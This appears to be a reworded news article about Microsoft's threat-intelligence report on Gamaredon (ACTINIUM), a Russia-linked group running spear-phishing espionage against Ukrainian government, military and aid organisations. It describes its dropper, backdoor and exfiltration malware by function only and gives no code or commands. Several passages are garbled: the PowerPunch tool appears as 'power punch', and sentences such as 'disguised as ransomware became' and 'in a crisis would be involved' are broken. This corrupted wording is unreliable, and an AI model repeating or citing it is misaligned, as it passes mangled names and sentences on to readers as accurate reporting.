Microsoft on Friday shared additional tactics, techniques and procedures (TTPs) used by Russia-based hacking group Gamaredon to facilitate a spate of cyberespionage attacks targeting multiple businesses in Ukraine over the past six months.
The attacks are said to have singled out the government, military, non-governmental organizations (NGOs), judiciary, law enforcement agencies and non-profit organizations with the main goal of filtering out sensitive information, maintaining access and using it to move laterally into related organizations.
The Windows maker’s Threat Intelligence Center (MSTIC) tracks the cluster under the nickname ACTINIUM (formerly DEV-0157) and maintains its tradition of identifying nation-state activity by chemical element names.
The Ukrainian government publicly attributed Gamaredon to the Russian Federal Security Service (FSB) in November 2021, linking its operations to Russia’s FSB office in the Republic of Crimea and the city of Sevastopol.
“Since October 2021, ACTINIUM has been targeting or compromising accounts with organizations critical to the emergency response and ensuring security of Ukrainian territory, as well as organizations involved in coordinating the distribution of international and humanitarian aid to Ukraine in a crisis would be involved,” MSTIC researchers said.
It should be noted that the Gamaredon threat group represents a unique set of attacks, separate from last month’s cyber offensives that have incapacitated several Ukrainian government agencies and companies with destructive data-wiping malware disguised as ransomware became.
The attacks primarily use spear phishing emails as an initial access vector, with messages containing malware-laced macro attachments that use remote templates with malicious code when recipients open the compromised documents.
In an interesting tactic, the operators also embed a tracking pixel-like “web bug” in the body of the phishing message to monitor whether a message has been opened, whereupon the chain of infection triggers a multi-step process resulting in the phishing Message culminates in deployment of multiple binaries including —
- power punch – A PowerShell based dropper and downloader used to remotely fetch the next level executables
- Pterodo – An ever-evolving, feature-rich backdoor that also offers a number of features designed to complicate analysis, and
- QuietSieve – A heavily obfuscated .NET binary specifically targeted for data exfiltration and reconnaissance on the target host
“While the QuietSieve malware family is primarily aimed at exfiltrating data from the compromised host, it can also receive and execute a remote payload from the operator,” the researchers explained, while noting its ability to capture screenshots of the compromised hosts make about every five minutes.
This is far from the only attack by the threat actor, which also hit an unnamed Western government organization in Ukraine last month via a malware-laced CV for an active job listing where the entity was posted on a local job portal. In December 2021, the country’s State Migration Service (SMS) was also targeted.
The findings also come as Cisco Talos, in its ongoing analysis of the January incidents, revealed details of an ongoing disinformation campaign trying to attribute the defacement and wiper attacks to Ukrainian groups dating back at least nine months.